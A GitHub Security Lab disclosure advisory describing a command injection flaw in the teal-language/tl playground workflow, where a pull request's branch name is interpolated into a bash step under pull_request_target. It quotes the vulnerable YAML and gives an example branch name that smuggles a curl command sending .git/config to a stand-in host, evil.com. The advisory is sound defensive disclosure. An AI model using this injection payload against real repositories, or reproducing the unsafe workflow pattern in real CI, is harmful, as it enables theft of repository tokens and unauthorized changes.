GHSL-2021-017: Command injection in teal-language/tl workflow

Coordinated Disclosure Timeline

• 2021-01-18: Report sent to maintainers.
• 2021-01-18: Issue resolved.

Summary

The playground GitHub workflow is vulnerable to unauthorized modification of the base repository or secrets exfiltration from a Pull Request.

Product

teal-language/tl repository

Tested Version

The latest changeset of playground.yml to the date.

Details

Issue: A branch name from the pull request is used to format a shell command

on:
  pull_request_target:
    branches: [ master ]
...
    - name: build
      run: |
        echo "${{ github.event.pull_request.head.repo.full_name }}/${{ github.head_ref }}"
        cd ${{ github.workspace }}/teal-playground
        yarn build

Impact

This vulnerability allows for arbitrary command injection into the bash script which allows for unauthorized modification of the base repository and secrets exfiltration. For example a PR from branch named a";${IFS}curl${IFS}-d${IFS}@.git/config${IFS}evil.com${IFS}# would exfiltrate the repository token to the attacker controlled server.

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-017 in any communication regarding this issue.